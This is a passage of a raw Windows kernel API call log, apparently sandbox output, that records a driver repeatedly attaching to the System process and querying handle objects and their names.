Object=0xffffd000b1b8e378*=0xffffe00069fa1f20, HandleInformation=0x0) returned 0x0 [0258.974] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0258.975] PsReleaseProcessExitSynchronization () returned 0x2 [0258.975] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f9bb [0258.975] ObQueryNameString (in: Object=0xffffe00069fa1f20, ObjectNameInfo=0xffffe0006a7aa7c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a7aa7c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0258.975] ObfDereferenceObject (Object=0xffffe00069fa1f20) returned 0x7ffe [0258.975] IoCompleteRequest () returned 0x0 [0258.975] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0258.975] PsAcquireProcessExitSynchronization () returned 0x0 [0258.975] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0258.975] ObReferenceObjectByHandle (in: Handle=0xffffffff80000e10, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe00069fa4890, HandleInformation=0x0) returned 0x0 [0258.975] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0258.975] PsReleaseProcessExitSynchronization () returned 0x2 [0258.975] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f9ba [0258.975] ObQueryNameString (in: Object=0xffffe00069fa4890, ObjectNameInfo=0xffffe0006a3f2044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a3f2044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0258.975] ObfDereferenceObject (Object=0xffffe00069fa4890) returned 0x7ffb [0258.975] IoCompleteRequest () returned 0x0 [0258.975] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0258.975] PsAcquireProcessExitSynchronization () returned 0x0 [0258.975] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0258.975] ObReferenceObjectByHandle (in: Handle=0xffffffff80000e14, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0x0, HandleInformation=0x0) returned 0xc0000008 [0258.975] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0258.975] PsReleaseProcessExitSynchronization () returned 0x2 [0258.975] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f9b9 [0258.975] IoCompleteRequest () returned 0x0 [0258.975] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0258.975] PsAcquireProcessExitSynchronization () returned 0x0 [0258.975] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0258.975] ObReferenceObjectByHandle (in: Handle=0xffffffff80000e18, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe00069f934c0, HandleInformation=0x0) returned 0x0 [0258.975] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0258.975] PsReleaseProcessExitSynchronization () returned 0x2 [0258.975] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f9b8 [0258.975] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a3a0044, Length=0x800, ReturnLength=0xffffd000b1b8e338 | out: ObjectNameInfo=0xffffe0006a3a0044, ReturnLength=0xffffd000b1b8e338) returned 0x0 [0258.975] ObfDereferenceObject (Object=0xffffe00069f934c0) returned 0x7fd9 [0258.975] IoCompleteRequest () returned 0x0 [0258.975] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0258.975] PsAcquireProcessExitSynchronization () returned 0x0 [0258.975] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0258.975] ObReferenceObjectByHandle (in: Handle=0xffffffff80000e2c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe0006a1217d0, HandleInformation=0x0) returned 0x0 [0258.975] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0258.975] PsReleaseProcessExitSynchronization () returned 0x2 [0258.975] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f9b7 [0258.975] ObQueryNameString (in: Object=0xffffe0006a1217d0, ObjectNameInfo=0xffffe0006a3b07c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a3b07c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0258.975] ObfDereferenceObject (Object=0xffffe0006a1217d0) returned 0x7ffe [0258.975] IoCompleteRequest () returned 0x0 [0258.975] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0258.976] PsAcquireProcessExitSynchronization () returned 0x0 [0258.976] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0258.976] ObReferenceObjectByHandle (in: Handle=0xffffffff80000e38, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe0006a280cd0, HandleInformation=0x0) returned 0x0 [0258.976] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0258.976] PsReleaseProcessExitSynchronization () returned 0x2 [0258.976] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f9b6 [0258.976] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a2cb4c4, Length=0x800, ReturnLength=0xffffd000b1b8e338 | out: ObjectNameInfo=0xffffe0006a2cb4c4, ReturnLength=0xffffd000b1b8e338) returned 0x0 [0258.976] ObfDereferenceObject (Object=0xffffe0006a280cd0) returned 0x7fce [0258.976] IoCompleteRequest () returned 0x0 [0258.976] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0258.976] PsAcquireProcessExitSynchronization () returned 0x0 [0258.976] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0258.976] ObReferenceObjectByHandle (in: Handle=0xffffffff80000e3c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe0006a136d40, HandleInformation=0x0) returned 0x0 [0258.976] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0258.976] PsReleaseProcessExitSynchronization () returned 0x2 [0258.976] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f9b5 [0258.976] ObQueryNameString (in: Object=0xffffe0006a136d40, ObjectNameInfo=0xffffe0006a4397c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a4397c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0258.976] ObfDereferenceObject (Object=0xffffe0006a136d40) returned 0x7ffb [0258.976] IoCompleteRequest () returned 0x0 [0258.976] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0258.976] PsAcquireProcessExitSynchronization () returned 0x0 [0258.976] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0258.976] ObReferenceObjectByHandle (in: Handle=0xffffffff80000e40, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe0006a403960, HandleInformation=0x0) returned 0x0 [0258.976] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0258.976] PsReleaseProcessExitSynchronization () returned 0x2 [0258.976] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f9b4 [0258.976] ObQueryNameString (in: Object=0xffffe0006a403960, ObjectNameInfo=0xffffe000690ef044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe000690ef044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0258.976] ObfDereferenceObject (Object=0xffffe0006a403960) returned 0x8000 [0258.976] IoCompleteRequest () returned 0x0 [0258.976] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0258.976] PsAcquireProcessExitSynchronization () returned 0x0 [0258.976] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0258.976] ObReferenceObjectByHandle (in: Handle=0xffffffff80000e44, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0x0, HandleInformation=0x0) returned 0xc0000008 [0258.976] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0258.976] PsReleaseProcessExitSynchronization () returned 0x2 [0258.976] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f9b3 [0258.976] IoCompleteRequest () returned 0x0 [0258.976] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0258.976] PsAcquireProcessExitSynchronization () returned 0x0 [0258.976] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0258.976] ObReferenceObjectByHandle (in: Handle=0xffffffff80000e50, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0x0, HandleInformation=0x0) returned 0xc0000008 [0258.976] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0258.976] PsReleaseProcessExitSynchronization () returned 0x2 [0258.976] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f9b2 [0258.976] IoCompleteRequest () returned 0x0 [0258.977] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0258.977] PsAcquireProcessExitSynchronization () returned 0x0 [0258.977] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0258.977] ObReferenceObjectByHandle (in: Handle=0xffffffff80000e64, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0x0, HandleInformation=0x0) returned 0xc0000008 [0258.977] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0258.977] PsReleaseProcessExitSynchronization () returned 0x2 [0258.977] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f9b1 [0258.977] IoCompleteRequest () returned 0x0 [0258.977] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0258.977] PsAcquireProcessExitSynchronization () returned 0x0 [0258.977] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0258.977] ObReferenceObjectByHandle (in: Handle=0xffffffff80000e6c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0x0, HandleInformation=0x0) returned 0xc0000008 [0258.977] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0258.977] PsReleaseProcessExitSynchronization () returned 0x2 [0258.977] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f9b0 [0258.977] IoCompleteRequest () returned 0x0 [0258.977] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0258.977] PsAcquireProcessExitSynchronization () returned 0x0 [0258.977] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0258.977] ObReferenceObjectByHandle (in: Handle=0xffffffff80000e7c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0x0, HandleInformation=0x0) returned 0xc0000008 [0258.977] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0258.977] PsReleaseProcessExitSynchronization () returned 0x2 [0258.977] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f9af [0258.977] IoCompleteRequest () returned 0x0 [0258.977] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0258.977] PsAcquireProcessExitSynchronization () returned 0x0 [0258.977] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0258.977] ObReferenceObjectByHandle (in: Handle=0xffffffff80000e8c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0x0, HandleInformation=0x0) returned 0xc0000008 [0258.977] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0258.977] PsReleaseProcessExitSynchronization () returned 0x2 [0258.977] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f9ae [0258.977] IoCompleteRequest () returned 0x0 [0258.977] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0258.977] PsAcquireProcessExitSynchronization () returned 0x0 [0258.977] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0258.977] ObReferenceObjectByHandle (in: Handle=0xffffffff80000e90, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0x0, HandleInformation=0x0) returned 0xc0000008 [0258.977] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0258.977] PsReleaseProcessExitSynchronization () returned 0x2 [0258.977] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f9ad [0258.977] IoCompleteRequest () returned 0x0 [0258.977] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0258.977] PsAcquireProcessExitSynchronization () returned 0x0 [0258.977] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0258.977] ObReferenceObjectByHandle (in: Handle=0xffffffff80000e94, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe00069ba2080, HandleInformation=0x0) returned 0x0 [0258.977] ObfDereferenceObject (Object=0xffffe00069ba2080) returned 0x18005 [0258.977] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0258.978] PsReleaseProcessExitSynchronization () returned 0x2 [0258.978] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f9ac [0258.978] IoCompleteRequest () returned 0x0 [0258.978] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0258.978] PsAcquireProcessExitSynchronization () returned 0x0 [0258.978] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0258.978] ObReferenceObjectByHandle (in: Handle=0xffffffff80000e98, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe00069ba2080, HandleInformation=0x0) returned 0x0 [0258.978] ObfDereferenceObject (Object=0xffffe00069ba2080) returned 0x20004 [0258.978] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0258.978] PsReleaseProcessExitSynchronization () returned 0x2 [0258.978] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f9ab [0258.978] IoCompleteRequest () returned 0x0 [0258.978] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0258.978] PsAcquireProcessExitSynchronization () returned 0x0 [0258.978] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0258.978] ObReferenceObjectByHandle (in: Handle=0xffffffff80000ea0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe0006a3b3850, HandleInformation=0x0) returned 0x0 [0258.978] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0258.978] PsReleaseProcessExitSynchronization () returned 0x2 [0258.978] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f9aa [0258.978] ObQueryNameString (in: Object=0xffffe0006a3b3850, ObjectNameInfo=0xffffe0006a3307c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a3307c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0258.978] ObfDereferenceObject (Object=0xffffe0006a3b3850) returned 0x8000 [0258.978] IoCompleteRequest () returned 0x0 [0258.978] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0258.978] PsAcquireProcessExitSynchronization () returned 0x0 [0258.978] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0258.978] ObReferenceObjectByHandle (in: Handle=0xffffffff80000ea8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0x0, HandleInformation=0x0) returned 0xc0000008 [0258.978] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0258.978] PsReleaseProcessExitSynchronization () returned 0x2 [0258.978] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f9a9 [0258.978] IoCompleteRequest () returned 0x0 [0258.978] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0258.978] PsAcquireProcessExitSynchronization () returned 0x0 [0258.978] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0258.978] ObReferenceObjectByHandle (in: Handle=0xffffffff80000eac, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe0006a7847c0, HandleInformation=0x0) returned 0x0 [0258.978] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0258.978] PsReleaseProcessExitSynchronization () returned 0x2 [0258.978] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f9a8 [0258.978] ObQueryNameString (in: Object=0xffffe0006a7847c0, ObjectNameInfo=0xffffe0006a3f8044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a3f8044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0258.978] ObfDereferenceObject (Object=0xffffe0006a7847c0) returned 0x8000 [0258.978] IoCompleteRequest () returned 0x0 [0258.978] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0258.978] PsAcquireProcessExitSynchronization () returned 0x0 [0258.978] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0258.978] ObReferenceObjectByHandle (in: Handle=0xffffffff80000eb0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe0006a89c4e0, HandleInformation=0x0) returned 0x0 [0258.978] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0258.978] PsReleaseProcessExitSynchronization () returned 0x2 [0258.978] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f9a7 [0258.979] ObQueryNameString (in: Object=0xffffe0006a89c4e0, ObjectNameInfo=0xffffe0006a33d044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a33d044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0258.979] ObfDereferenceObject (Object=0xffffe0006a89c4e0) returned 0x8000 [0258.979] IoCompleteRequest () returned 0x0 [0258.979] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0258.979] PsAcquireProcessExitSynchronization () returned 0x0 [0258.979] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0258.979] ObReferenceObjectByHandle (in: Handle=0xffffffff80000eb8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe0006a070230, HandleInformation=0x0) returned 0x0 [0258.979] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0258.979] PsReleaseProcessExitSynchronization () returned 0x2 [0258.979] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f9a6 [0258.979] ObQueryNameString (in: Object=0xffffe0006a070230, ObjectNameInfo=0xffffe00068178044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe00068178044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0258.979] ObfDereferenceObject (Object=0xffffe0006a070230) returned 0x8000 [0258.979] IoCompleteRequest () returned 0x0 [0258.979] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0258.979] PsAcquireProcessExitSynchronization () returned 0x0 [0258.979] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0258.979] ObReferenceObjectByHandle (in: Handle=0xffffffff80000ec4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe000695188b0, HandleInformation=0x0) returned 0x0 [0258.979] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0258.979] PsReleaseProcessExitSynchronization () returned 0x2 [0258.979] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f9a5 [0258.979] ObQueryNameString (in: Object=0xffffe000695188b0, ObjectNameInfo=0xffffe00068a59684, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe00068a59684, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0258.979] ObfDereferenceObject (Object=0xffffe000695188b0) returned 0x8000 [0258.979] IoCompleteRequest () returned 0x0 [0258.979] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0258.979] PsAcquireProcessExitSynchronization () returned 0x0 [0258.979] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0258.979] ObReferenceObjectByHandle (in: Handle=0xffffffff80000ed0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0x0, HandleInformation=0x0) returned 0xc0000008 [0258.979] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0258.979] PsReleaseProcessExitSynchronization () returned 0x2 [0258.979] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f9a4 [0258.979] IoCompleteRequest () returned 0x0 [0258.979] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0258.979] PsAcquireProcessExitSynchronization () returned 0x0 [0258.979] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0258.979] ObReferenceObjectByHandle (in: Handle=0xffffffff80000ed8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe0007c7bc980, HandleInformation=0x0) returned 0x0 [0258.979] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0258.979] PsReleaseProcessExitSynchronization () returned 0x2 [0258.979] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f9a3 [0258.979] ObQueryNameString (in: Object=0xffffe0007c7bc980, ObjectNameInfo=0xffffe000684197c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe000684197c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0258.979] ObfDereferenceObject (Object=0xffffe0007c7bc980) returned 0x8000 [0258.979] IoCompleteRequest () returned 0x0 [0258.979] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0258.979] PsAcquireProcessExitSynchronization () returned 0x0 [0258.979] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0258.979] ObReferenceObjectByHandle (in: Handle=0xffffffff80000ee0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe0006a722300, HandleInformation=0x0) returned 0x0 [0258.979] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0258.979] PsReleaseProcessExitSynchronization () returned 0x2 [0258.979] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f9a2 [0258.979] ObQueryNameString (in: Object=0xffffe0006a722300, ObjectNameInfo=0xffffe0006a3b4344, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a3b4344, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0258.980] ObfDereferenceObject (Object=0xffffe0006a722300) returned 0x8000 [0258.980] IoCompleteRequest () returned 0x0 [0258.980] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0258.980] PsAcquireProcessExitSynchronization () returned 0x0 [0258.980] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0258.980] ObReferenceObjectByHandle (in: Handle=0xffffffff80000ee4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe0006a778600, HandleInformation=0x0) returned 0x0 [0258.980] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0258.980] PsReleaseProcessExitSynchronization () returned 0x2 [0258.980] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f9a1 [0258.980] ObQueryNameString (in: 